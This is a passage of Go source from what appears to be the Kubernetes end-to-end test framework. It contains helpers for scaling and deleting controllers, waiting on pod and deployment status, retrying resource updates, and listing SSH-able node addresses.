return fmt.Errorf("error while scaling RC %s to %d replicas: %v", name, size, err)
}
if !wait {
return nil
}
return WaitForControlledPodsRunning(clientset, ns, name, kind)
}
// Wait up to 10 minutes for pods to become Running.
func WaitForControlledPodsRunning(c clientset.Interface, ns, name string, kind schema.GroupKind) error {
rtObject, err := getRuntimeObjectForKind(c, kind, ns, name)
if err != nil {
return err
}
selector, err := getSelectorFromRuntimeObject(rtObject)
if err != nil {
return err
}
err = testutils.WaitForPodsWithLabelRunning(c, ns, selector)
if err != nil {
return fmt.Errorf("Error while waiting for replication controller %s pods to be running: %v", name, err)
}
return nil
}
func ScaleRC(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string, size uint, wait bool) error {
return ScaleResource(clientset, internalClientset, ns, name, size, wait, api.Kind("ReplicationController"))
}
func ScaleDeployment(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string, size uint, wait bool) error {
return ScaleResource(clientset, internalClientset, ns, name, size, wait, extensionsinternal.Kind("Deployment"))
}
// Returns true if all the specified pods are scheduled, else returns false.
func podsWithLabelScheduled(c clientset.Interface, ns string, label labels.Selector) (bool, error) {
ps := testutils.NewPodStore(c, ns, label, fields.Everything())
defer ps.Stop()
pods := ps.List()
if len(pods) == 0 {
return false, nil
}
for _, pod := range pods {
if pod.Spec.NodeName == "" {
return false, nil
}
}
return true, nil
}
// Wait for all matching pods to become scheduled and at least one
// matching pod exists. Return the list of matching pods.
func WaitForPodsWithLabelScheduled(c clientset.Interface, ns string, label labels.Selector) (pods *v1.PodList, err error) {
err = wait.PollImmediate(Poll, podScheduledBeforeTimeout,
func() (bool, error) {
pods, err = WaitForPodsWithLabel(c, ns, label)
if err != nil {
return false, err
}
for _, pod := range pods.Items {
if pod.Spec.NodeName == "" {
return false, nil
}
}
return true, nil
})
return pods, err
}
// Wait up to PodListTimeout to get pods matching the given label.
func WaitForPodsWithLabel(c clientset.Interface, ns string, label labels.Selector) (pods *v1.PodList, err error) {
for t := time.Now(); time.Since(t) < PodListTimeout; time.Sleep(Poll) {
options := metav1.ListOptions{LabelSelector: label.String()}
pods, err = c.Core().Pods(ns).List(options)
Expect(err).NotTo(HaveOccurred())
if len(pods.Items) > 0 {
break
}
}
if pods == nil || len(pods.Items) == 0 {
err = fmt.Errorf("Timeout while waiting for pods with label %v", label)
}
return
}
// Wait for the exact number of matching pods to become running and ready.
// Return the list of matching pods.
func WaitForPodsWithLabelRunningReady(c clientset.Interface, ns string, label labels.Selector, num int, timeout time.Duration) (pods *v1.PodList, err error) {
var current int
err = wait.Poll(Poll, timeout,
func() (bool, error) {
pods, err := WaitForPodsWithLabel(c, ns, label)
if err != nil {
Logf("Failed to list pods: %v", err)
return false, nil
}
current = 0
for _, pod := range pods.Items {
if flag, err := testutils.PodRunningReady(&pod); err == nil && flag {
current++
}
}
if current != num {
Logf("Got %v pods running and ready, expect: %v", current, num)
return false, nil
}
return true, nil
})
return pods, err
}
func getRuntimeObjectForKind(c clientset.Interface, kind schema.GroupKind, ns, name string) (runtime.Object, error) {
switch kind {
case api.Kind("ReplicationController"):
return c.Core().ReplicationControllers(ns).Get(name, metav1.GetOptions{})
case extensionsinternal.Kind("ReplicaSet"):
return c.Extensions().ReplicaSets(ns).Get(name, metav1.GetOptions{})
case extensionsinternal.Kind("Deployment"):
return c.Extensions().Deployments(ns).Get(name, metav1.GetOptions{})
case extensionsinternal.Kind("DaemonSet"):
return c.Extensions().DaemonSets(ns).Get(name, metav1.GetOptions{})
case batchinternal.Kind("Job"):
return c.Batch().Jobs(ns).Get(name, metav1.GetOptions{})
default:
return nil, fmt.Errorf("Unsupported kind when getting runtime object: %v", kind)
}
}
func deleteResource(c clientset.Interface, kind schema.GroupKind, ns, name string, deleteOption *metav1.DeleteOptions) error {
switch kind {
case api.Kind("ReplicationController"):
return c.Core().ReplicationControllers(ns).Delete(name, deleteOption)
case extensionsinternal.Kind("ReplicaSet"):
return c.Extensions().ReplicaSets(ns).Delete(name, deleteOption)
case extensionsinternal.Kind("Deployment"):
return c.Extensions().Deployments(ns).Delete(name, deleteOption)
case extensionsinternal.Kind("DaemonSet"):
return c.Extensions().DaemonSets(ns).Delete(name, deleteOption)
case batchinternal.Kind("Job"):
return c.Batch().Jobs(ns).Delete(name, deleteOption)
default:
return fmt.Errorf("Unsupported kind when deleting: %v", kind)
}
}
func getSelectorFromRuntimeObject(obj runtime.Object) (labels.Selector, error) {
switch typed := obj.(type) {
case *v1.ReplicationController:
return labels.SelectorFromSet(typed.Spec.Selector), nil
case *extensions.ReplicaSet:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
case *extensions.Deployment:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
case *extensions.DaemonSet:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
case *batch.Job:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
default:
return nil, fmt.Errorf("Unsupported kind when getting selector: %v", obj)
}
}
func getReplicasFromRuntimeObject(obj runtime.Object) (int32, error) {
switch typed := obj.(type) {
case *v1.ReplicationController:
if typed.Spec.Replicas != nil {
return *typed.Spec.Replicas, nil
}
return 0, nil
case *extensions.ReplicaSet:
if typed.Spec.Replicas != nil {
return *typed.Spec.Replicas, nil
}
return 0, nil
case *extensions.Deployment:
if typed.Spec.Replicas != nil {
return *typed.Spec.Replicas, nil
}
return 0, nil
case *batch.Job:
// TODO: currently we use pause pods so that's OK. When we'll want to switch to Pods
// that actually finish we need a better way to do this.
if typed.Spec.Parallelism != nil {
return *typed.Spec.Parallelism, nil
}
return 0, nil
default:
return -1, fmt.Errorf("Unsupported kind when getting number of replicas: %v", obj)
}
}
func getReaperForKind(internalClientset internalclientset.Interface, kind schema.GroupKind) (kubectl.Reaper, error) {
return kubectl.ReaperFor(kind, internalClientset)
}
// DeleteResourceAndPods deletes a given resource and all pods it spawned
func DeleteResourceAndPods(clientset clientset.Interface, internalClientset internalclientset.Interface, kind schema.GroupKind, ns, name string) error {
By(fmt.Sprintf("deleting %v %s in namespace %s", kind, name, ns))
rtObject, err := getRuntimeObjectForKind(clientset, kind, ns, name)
if err != nil {
if apierrs.IsNotFound(err) {
Logf("%v %s not found: %v", kind, name, err)
return nil
}
return err
}
selector, err := getSelectorFromRuntimeObject(rtObject)
if err != nil {
return err
}
reaper, err := getReaperForKind(internalClientset, kind)
if err != nil {
return err
}
ps, err := podStoreForSelector(clientset, ns, selector)
if err != nil {
return err
}
defer ps.Stop()
startTime := time.Now()
err = reaper.Stop(ns, name, 0, nil)
if apierrs.IsNotFound(err) {
Logf("%v %s was already deleted: %v", kind, name, err)
return nil
}
if err != nil {
return fmt.Errorf("error while stopping %v: %s: %v", kind, name, err)
}
deleteTime := time.Since(startTime)
Logf("Deleting %v %s took: %v", kind, name, deleteTime)
err = waitForPodsInactive(ps, 100*time.Millisecond, 10*time.Minute)
if err != nil {
return fmt.Errorf("error while waiting for pods to become inactive %s: %v", name, err)
}
terminatePodTime := time.Since(startTime) - deleteTime
Logf("Terminating %v %s pods took: %v", kind, name, terminatePodTime)
// this is to relieve namespace controller's pressure when deleting the
// namespace after a test.
err = waitForPodsGone(ps, 100*time.Millisecond, 10*time.Minute)
if err != nil {
return fmt.Errorf("error while waiting for pods gone %s: %v", name, err)
}
gcPodTime := time.Since(startTime) - terminatePodTime
Logf("Garbage collecting %v %s pods took: %v", kind, name, gcPodTime)
return nil
}
func DeleteRCAndPods(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string) error {
return DeleteResourceAndPods(clientset, internalClientset, api.Kind("ReplicationController"), ns, name)
}
// DeleteResourceAndWaitForGC deletes only given resource and waits for GC to delete the pods.
func DeleteResourceAndWaitForGC(c clientset.Interface, kind schema.GroupKind, ns, name string) error {
By(fmt.Sprintf("deleting %v %s in namespace %s, will wait for the garbage collector to delete the pods", kind, name, ns))
rtObject, err := getRuntimeObjectForKind(c, kind, ns, name)
if err != nil {
if apierrs.IsNotFound(err) {
Logf("%v %s not found: %v", kind, name, err)
return nil
}
return err
}
selector, err := getSelectorFromRuntimeObject(rtObject)
if err != nil {
return err
}
replicas, err := getReplicasFromRuntimeObject(rtObject)
if err != nil {
return err
}
ps, err := podStoreForSelector(c, ns, selector)
if err != nil {
return err
}
defer ps.Stop()
startTime := time.Now()
falseVar := false
deleteOption := &metav1.DeleteOptions{OrphanDependents: &falseVar}
err = deleteResource(c, kind, ns, name, deleteOption)
if err != nil && apierrs.IsNotFound(err) {
Logf("%v %s was already deleted: %v", kind, name, err)
return nil
}
if err != nil {
return err
}
deleteTime := time.Since(startTime)
Logf("Deleting %v %s took: %v", kind, name, deleteTime)
var interval, timeout time.Duration
switch {
case replicas < 100:
interval = 100 * time.Millisecond
case replicas < 1000:
interval = 1 * time.Second
default:
interval = 10 * time.Second
}
if replicas < 5000 {
timeout = 10 * time.Minute
} else {
timeout = time.Duration(replicas/gcThroughput) * time.Second
// gcThroughput is pretty strict now, add a bit more to it
timeout = timeout + 3*time.Minute
}
err = waitForPodsInactive(ps, interval, timeout)
if err != nil {
return fmt.Errorf("error while waiting for pods to become inactive %s: %v", name, err)
}
terminatePodTime := time.Since(startTime) - deleteTime
Logf("Terminating %v %s pods took: %v", kind, name, terminatePodTime)
err = waitForPodsGone(ps, interval, 10*time.Minute)
if err != nil {
return fmt.Errorf("error while waiting for pods gone %s: %v", name, err)
}
return nil
}
// DeleteRCAndWaitForGC deletes only the Replication Controller and waits for GC to delete the pods.
func DeleteRCAndWaitForGC(c clientset.Interface, ns, name string) error {
return DeleteResourceAndWaitForGC(c, api.Kind("ReplicationController"), ns, name)
}
// podStoreForSelector creates a PodStore that monitors pods from given namespace matching given selector.
// It waits until the reflector does a List() before returning.
func podStoreForSelector(c clientset.Interface, ns string, selector labels.Selector) (*testutils.PodStore, error) {
ps := testutils.NewPodStore(c, ns, selector, fields.Everything())
err := wait.Poll(100*time.Millisecond, 2*time.Minute, func() (bool, error) {
if len(ps.Reflector.LastSyncResourceVersion()) != 0 {
return true, nil
}
return false, nil
})
return ps, err
}
// waitForPodsInactive waits until there are no active pods left in the PodStore.
// This is to make a fair comparison of deletion time between DeleteRCAndPods
// and DeleteRCAndWaitForGC, because the RC controller decreases status.replicas
// when the pod is inactive.
func waitForPodsInactive(ps *testutils.PodStore, interval, timeout time.Duration) error {
return wait.PollImmediate(interval, timeout, func() (bool, error) {
pods := ps.List()
for _, pod := range pods {
if controller.IsPodActive(pod) {
return false, nil
}
}
return true, nil
})
}
// waitForPodsGone waits until there are no pods left in the PodStore.
func waitForPodsGone(ps *testutils.PodStore, interval, timeout time.Duration) error {
return wait.PollImmediate(interval, timeout, func() (bool, error) {
if pods := ps.List(); len(pods) == 0 {
return true, nil
}
return false, nil
})
}
// Delete a ReplicaSet and all pods it spawned
func DeleteReplicaSet(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string) error {
By(fmt.Sprintf("deleting ReplicaSet %s in namespace %s", name, ns))
rc, err := clientset.Extensions().ReplicaSets(ns).Get(name, metav1.GetOptions{})
if err != nil {
if apierrs.IsNotFound(err) {
Logf("ReplicaSet %s was already deleted: %v", name, err)
return nil
}
return err
}
reaper, err := kubectl.ReaperFor(extensionsinternal.Kind("ReplicaSet"), internalClientset)
if err != nil {
if apierrs.IsNotFound(err) {
Logf("ReplicaSet %s was already deleted: %v", name, err)
return nil
}
return err
}
startTime := time.Now()
err = reaper.Stop(ns, name, 0, nil)
if apierrs.IsNotFound(err) {
Logf("ReplicaSet %s was already deleted: %v", name, err)
return nil
}
deleteRSTime := time.Since(startTime)
Logf("Deleting RS %s took: %v", name, deleteRSTime)
if err == nil {
err = waitForReplicaSetPodsGone(clientset, rc)
}
terminatePodTime := time.Since(startTime) - deleteRSTime
Logf("Terminating ReplicaSet %s pods took: %v", name, terminatePodTime)
return err
}
// waitForReplicaSetPodsGone waits until there are no pods reported under a
// ReplicaSet selector (because the pods have completed termination).
func waitForReplicaSetPodsGone(c clientset.Interface, rs *extensions.ReplicaSet) error {
return wait.PollImmediate(Poll, 2*time.Minute, func() (bool, error) {
selector, err := metav1.LabelSelectorAsSelector(rs.Spec.Selector)
ExpectNoError(err)
options := metav1.ListOptions{LabelSelector: selector.String()}
if pods, err := c.Core().Pods(rs.Namespace).List(options); err == nil && len(pods.Items) == 0 {
return true, nil
}
return false, nil
})
}
// WaitForReadyReplicaSet waits until the replica set has all of its replicas ready.
func WaitForReadyReplicaSet(c clientset.Interface, ns, name string) error {
rs, err := c.Extensions().ReplicaSets(ns).Get(name, metav1.GetOptions{})
if err != nil {
return err
}
selector, err := metav1.LabelSelectorAsSelector(rs.Spec.Selector)
if err != nil {
return err
}
options := metav1.ListOptions{LabelSelector: selector.String()}
podList, err := c.Core().Pods(rs.Namespace).List(options)
if err != nil {
return err
}
readyPods := int32(0)
unready := sets.NewString()
for i := range podList.Items {
pod := podList.Items[i]
if podutil.IsPodReady(&pod) {
readyPods++
} else {
unready.Insert(pod.Name)
}
}
// All pods for our replica set are ready.
if *(rs.Spec.Replicas) == rs.Status.Replicas && *(rs.Spec.Replicas) == readyPods {
return nil
}
options.ResourceVersion = podList.ResourceVersion
w, err := c.Core().Pods(ns).Watch(options)
if err != nil {
return err
}
defer w.Stop()
condition := func(event watch.Event) (bool, error) {
if event.Type != watch.Modified {
return false, nil
}
pod := event.Object.(*v1.Pod)
if podutil.IsPodReady(pod) && unready.Has(pod.Name) {
unready.Delete(pod.Name)
}
return unready.Len() == 0, nil
}
_, err = watch.Until(Poll, w, condition)
if err == wait.ErrWaitTimeout {
err = fmt.Errorf("replica set %q never became ready", name)
}
return err
}
func NewDeployment(deploymentName string, replicas int32, podLabels map[string]string, imageName, image string, strategyType extensions.DeploymentStrategyType) *extensions.Deployment {
zero := int64(0)
return &extensions.Deployment{
ObjectMeta: metav1.ObjectMeta{
Name: deploymentName,
},
Spec: extensions.DeploymentSpec{
Replicas: &replicas,
Selector: &metav1.LabelSelector{MatchLabels: podLabels},
Strategy: extensions.DeploymentStrategy{
Type: strategyType,
},
Template: v1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Labels: podLabels,
},
Spec: v1.PodSpec{
TerminationGracePeriodSeconds: &zero,
Containers: []v1.Container{
{
Name: imageName,
Image: image,
},
},
},
},
},
}
}
// Waits for the deployment status to become valid (i.e. max unavailable and max surge aren't violated anymore).
// Note that the status should stay valid at all times unless it is shortly after a scaling event or the deployment was just created.
// To verify that the deployment status is valid and wait for the rollout to finish, use WaitForDeploymentStatus instead.
func WaitForDeploymentStatusValid(c clientset.Interface, d *extensions.Deployment) error {
return testutil.WaitForDeploymentStatusValid(c, d, Logf, Poll, pollLongTimeout)
}
// Waits for the deployment to reach desired state.
// Returns an error if the deployment's rolling update strategy (max unavailable or max surge) is broken at any times.
func WaitForDeploymentStatus(c clientset.Interface, d *extensions.Deployment) error {
var (
oldRSs, allOldRSs, allRSs []*extensions.ReplicaSet
newRS *extensions.ReplicaSet
deployment *extensions.Deployment
)
err := wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
var err error
deployment, err = c.Extensions().Deployments(d.Namespace).Get(d.Name, metav1.GetOptions{})
if err != nil {
return false, err
}
oldRSs, allOldRSs, newRS, err = deploymentutil.GetAllReplicaSets(deployment, c)
if err != nil {
return false, err
}
if newRS == nil {
// New RS hasn't been created yet.
return false, nil
}
allRSs = append(oldRSs, newRS)
// The old/new ReplicaSets need to contain the pod-template-hash label
for i := range allRSs {
if !labelsutil.SelectorHasLabel(allRSs[i].Spec.Selector, extensions.DefaultDeploymentUniqueLabelKey) {
return false, nil
}
}
totalCreated := deploymentutil.GetReplicaCountForReplicaSets(allRSs)
maxCreated := *(deployment.Spec.Replicas) + deploymentutil.MaxSurge(*deployment)
if totalCreated > maxCreated {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, allRSs)
return false, fmt.Errorf("total pods created: %d, more than the max allowed: %d", totalCreated, maxCreated)
}
minAvailable := deploymentutil.MinAvailable(deployment)
if deployment.Status.AvailableReplicas < minAvailable {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, allRSs)
return false, fmt.Errorf("total pods available: %d, less than the min required: %d", deployment.Status.AvailableReplicas, minAvailable)
}
// When the deployment status and its underlying resources reach the desired state, we're done
return deploymentutil.DeploymentComplete(deployment, &deployment.Status), nil
})
if err == wait.ErrWaitTimeout {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, allRSs)
}
if err != nil {
return fmt.Errorf("error waiting for deployment %q status to match expectation: %v", d.Name, err)
}
return nil
}
// WaitForDeploymentUpdatedReplicasLTE waits for the given deployment to be observed by the controller and to have at least minUpdatedReplicas updated replicas.
func WaitForDeploymentUpdatedReplicasLTE(c clientset.Interface, ns, deploymentName string, minUpdatedReplicas int32, desiredGeneration int64) error {
err := wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
if deployment.Status.ObservedGeneration >= desiredGeneration && deployment.Status.UpdatedReplicas >= minUpdatedReplicas {
return true, nil
}
return false, nil
})
if err != nil {
return fmt.Errorf("error waiting for deployment %s to have at least %d updpatedReplicas: %v", deploymentName, minUpdatedReplicas, err)
}
return nil
}
// WaitForDeploymentRollbackCleared waits until the given deployment has either started rolling back or no longer needs to roll back.
// Note that rollback should be cleared shortly, so we only wait for 1 minute here to fail early.
func WaitForDeploymentRollbackCleared(c clientset.Interface, ns, deploymentName string) error {
err := wait.Poll(Poll, 1*time.Minute, func() (bool, error) {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
// Rollback not set or is kicked off
if deployment.Spec.RollbackTo == nil {
return true, nil
}
return false, nil
})
if err != nil {
return fmt.Errorf("error waiting for deployment %s rollbackTo to be cleared: %v", deploymentName, err)
}
return nil
}
// WatchRecreateDeployment watches Recreate deployments and ensures no new pods will run at the same time with
// old pods.
func WatchRecreateDeployment(c clientset.Interface, d *extensions.Deployment) error {
if d.Spec.Strategy.Type != extensions.RecreateDeploymentStrategyType {
return fmt.Errorf("deployment %q does not use a Recreate strategy: %s", d.Name, d.Spec.Strategy.Type)
}
w, err := c.Extensions().Deployments(d.Namespace).Watch(metav1.SingleObject(metav1.ObjectMeta{Name: d.Name, ResourceVersion: d.ResourceVersion}))
if err != nil {
return err
}
status := d.Status
condition := func(event watch.Event) (bool, error) {
d := event.Object.(*extensions.Deployment)
status = d.Status
if d.Status.UpdatedReplicas > 0 && d.Status.Replicas != d.Status.UpdatedReplicas {
_, allOldRSs, err := deploymentutil.GetOldReplicaSets(d, c)
newRS, nerr := deploymentutil.GetNewReplicaSet(d, c)
if err == nil && nerr == nil {
Logf("%+v", d)
logReplicaSetsOfDeployment(d, allOldRSs, newRS)
logPodsOfDeployment(c, d, append(allOldRSs, newRS))
}
return false, fmt.Errorf("deployment %q is running new pods alongside old pods: %#v", d.Name, status)
}
return *(d.Spec.Replicas) == d.Status.Replicas &&
*(d.Spec.Replicas) == d.Status.UpdatedReplicas &&
d.Generation <= d.Status.ObservedGeneration, nil
}
_, err = watch.Until(2*time.Minute, w, condition)
if err == wait.ErrWaitTimeout {
err = fmt.Errorf("deployment %q never completed: %#v", d.Name, status)
}
return err
}
// WaitForDeploymentRevisionAndImage waits for the deployment's and its new RS's revision and container image to match the given revision and image.
// Note that deployment revision and its new RS revision should be updated shortly, so we only wait for 1 minute here to fail early.
func WaitForDeploymentRevisionAndImage(c clientset.Interface, ns, deploymentName string, revision, image string) error {
return testutil.WaitForDeploymentRevisionAndImage(c, ns, deploymentName, revision, image, Logf, Poll, pollShortTimeout)
}
// CheckNewRSAnnotations checks whether the new RS's annotations are as expected.
func CheckNewRSAnnotations(c clientset.Interface, ns, deploymentName string, expectedAnnotations map[string]string) error {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return err
}
newRS, err := deploymentutil.GetNewReplicaSet(deployment, c)
if err != nil {
return err
}
for k, v := range expectedAnnotations {
// Skip checking revision annotations
if k != deploymentutil.RevisionAnnotation && v != newRS.Annotations[k] {
return fmt.Errorf("Expected new RS annotations = %+v, got %+v", expectedAnnotations, newRS.Annotations)
}
}
return nil
}
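// WaitForPodsReady waits until every pod labeled name=<name> in the namespace
// has been available for at least minReadySeconds.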
func WaitForPodsReady(c clientset.Interface, ns, name string, minReadySeconds int) error {
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": name}))
options := metav1.ListOptions{LabelSelector: label.String()}
return wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
pods, err := c.Core().Pods(ns).List(options)
if err != nil {
return false, nil
}
for _, pod := range pods.Items {
if !podutil.IsPodAvailable(&pod, int32(minReadySeconds), metav1.Now()) {
return false, nil
}
}
return true, nil
})
}
// Waits for the deployment to clean up old replica sets.
func WaitForDeploymentOldRSsNum(c clientset.Interface, ns, deploymentName string, desiredRSNum int) error {
var oldRSs []*extensions.ReplicaSet
var d *extensions.Deployment
pollErr := wait.PollImmediate(Poll, 5*time.Minute, func() (bool, error) {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
d = deployment
_, oldRSs, err = deploymentutil.GetOldReplicaSets(deployment, c)
if err != nil {
return false, err
}
return len(oldRSs) == desiredRSNum, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("%d old replica sets were not cleaned up for deployment %q", len(oldRSs)-desiredRSNum, deploymentName)
logReplicaSetsOfDeployment(d, oldRSs, nil)
}
return pollErr
}
func logReplicaSetsOfDeployment(deployment *extensions.Deployment, allOldRSs []*extensions.ReplicaSet, newRS *extensions.ReplicaSet) {
testutil.LogReplicaSetsOfDeployment(deployment, allOldRSs, newRS, Logf)
}
func WaitForObservedDeployment(c clientset.Interface, ns, deploymentName string, desiredGeneration int64) error {
return deploymentutil.WaitForObservedDeployment(func() (*extensions.Deployment, error) {
return c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
}, desiredGeneration, Poll, 1*time.Minute)
}
func WaitForDeploymentWithCondition(c clientset.Interface, ns, deploymentName, reason string, condType extensions.DeploymentConditionType) error {
var deployment *extensions.Deployment
pollErr := wait.PollImmediate(time.Second, 5*time.Minute, func() (bool, error) {
d, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
deployment = d
cond := deploymentutil.GetDeploymentCondition(deployment.Status, condType)
return cond != nil && cond.Reason == reason, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("deployment %q never updated with the desired condition and reason: %v", deployment.Name, deployment.Status.Conditions)
_, allOldRSs, newRS, err := deploymentutil.GetAllReplicaSets(deployment, c)
if err == nil {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, append(allOldRSs, newRS))
}
}
return pollErr
}
func logPodsOfDeployment(c clientset.Interface, deployment *extensions.Deployment, rsList []*extensions.ReplicaSet) {
testutil.LogPodsOfDeployment(c, deployment, rsList, Logf)
}
// Waits for the number of events on the given object to reach a desired count.
func WaitForEvents(c clientset.Interface, ns string, objOrRef runtime.Object, desiredEventsCount int) error {
return wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
events, err := c.Core().Events(ns).Search(api.Scheme, objOrRef)
if err != nil {
return false, fmt.Errorf("error in listing events: %s", err)
}
eventsCount := len(events.Items)
if eventsCount == desiredEventsCount {
return true, nil
}
if eventsCount < desiredEventsCount {
return false, nil
}
// Number of events has exceeded the desired count.
return false, fmt.Errorf("number of events has exceeded the desired count, eventsCount: %d, desiredCount: %d", eventsCount, desiredEventsCount)
})
}
// Waits for the number of events on the given object to be at least a desired count.
func WaitForPartialEvents(c clientset.Interface, ns string, objOrRef runtime.Object, atLeastEventsCount int) error {
return wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
events, err := c.Core().Events(ns).Search(api.Scheme, objOrRef)
if err != nil {
return false, fmt.Errorf("error in listing events: %s", err)
}
eventsCount := len(events.Items)
if eventsCount >= atLeastEventsCount {
return true, nil
}
return false, nil
})
}
type updateDeploymentFunc func(d *extensions.Deployment)
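// UpdateDeploymentWithRetries fetches the named deployment, applies
// applyUpdate to it, and pushes the result to the apiserver, retrying on
// failure for up to one minute. A hypothetical caller might bump a container
// image like this:
//
//	UpdateDeploymentWithRetries(c, ns, "web", func(d *extensions.Deployment) {
//		d.Spec.Template.Spec.Containers[0].Image = "nginx:1.13"
//	})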
func UpdateDeploymentWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateDeploymentFunc) (deployment *extensions.Deployment, err error) {
deployments := c.Extensions().Deployments(namespace)
var updateErr error
pollErr := wait.Poll(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
if deployment, err = deployments.Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(deployment)
if deployment, err = deployments.Update(deployment); err == nil {
Logf("Updating deployment %s", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to deployment %q: %v", name, updateErr)
}
return deployment, pollErr
}
type updateRsFunc func(d *extensions.ReplicaSet)
func UpdateReplicaSetWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateRsFunc) (*extensions.ReplicaSet, error) {
var rs *extensions.ReplicaSet
var updateErr error
pollErr := wait.PollImmediate(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
var err error
if rs, err = c.Extensions().ReplicaSets(namespace).Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(rs)
if rs, err = c.Extensions().ReplicaSets(namespace).Update(rs); err == nil {
Logf("Updating replica set %q", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to replicaset %q: %v", name, updateErr)
}
return rs, pollErr
}
type updateRcFunc func(d *v1.ReplicationController)
func UpdateReplicationControllerWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateRcFunc) (*v1.ReplicationController, error) {
var rc *v1.ReplicationController
var updateErr error
pollErr := wait.PollImmediate(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
var err error
if rc, err = c.Core().ReplicationControllers(namespace).Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(rc)
if rc, err = c.Core().ReplicationControllers(namespace).Update(rc); err == nil {
Logf("Updating replication controller %q", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to rc %q: %v", name, updateErr)
}
return rc, pollErr
}
type updateStatefulSetFunc func(*apps.StatefulSet)
func UpdateStatefulSetWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateStatefulSetFunc) (statefulSet *apps.StatefulSet, err error) {
statefulSets := c.Apps().StatefulSets(namespace)
var updateErr error
pollErr := wait.Poll(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
if statefulSet, err = statefulSets.Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(statefulSet)
if statefulSet, err = statefulSets.Update(statefulSet); err == nil {
Logf("Updating stateful set %s", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to stateful set %q: %v", name, updateErr)
}
return statefulSet, pollErr
}
type updateJobFunc func(*batch.Job)
func UpdateJobWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateJobFunc) (job *batch.Job, err error) {
jobs := c.Batch().Jobs(namespace)
var updateErr error
pollErr := wait.PollImmediate(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
if job, err = jobs.Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(job)
if job, err = jobs.Update(job); err == nil {
Logf("Updating job %s", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to job %q: %v", name, updateErr)
}
return job, pollErr
}
// NodeAddresses returns the first address of the given type of each node.
func NodeAddresses(nodelist *v1.NodeList, addrType v1.NodeAddressType) []string {
hosts := []string{}
for _, n := range nodelist.Items {
for _, addr := range n.Status.Addresses {
// Use the first external IP address we find on the node, and
// use at most one per node.
// TODO(roberthbailey): Use the "preferred" address for the node, once
// such a thing is defined (#2462).
if addr.Type == addrType {
hosts = append(hosts, addr.Address)
break
}
}
}
return hosts
}
// NodeSSHHosts returns SSH-able host names for all schedulable nodes - this excludes master node.
// It returns an error if it can't find an external IP for every node, though it still returns all
// hosts that it found in that case.
func NodeSSHHosts(c clientset.Interface) ([]string, error) {
nodelist := waitListSchedulableNodesOrDie(c)
// TODO(roberthbailey): Use the "preferred" address for the node, once such a thing is defined (#2462).
hosts := NodeAddresses(nodelist, v1.NodeExternalIP)
// Error if any node didn't have an external IP.
if len(hosts) != len(nodelist.Items) {
return hosts, fmt.Errorf(
"only found %d external IPs on nodes, but found %d nodes. Nodelist: %v",
len(hosts), len(nodelist.Items), nodelist)
}
sshHosts := make([]string, 0, len(hosts))
for _, h := range hosts {
sshHosts = append(sshHosts, net.JoinHostPort(h, sshPort))
}
return sshHosts, nil
}
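// SSHResult captures the outcome of a remote command: the user and host it
// ran against, the command itself, and its stdout, stderr, and exit code.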
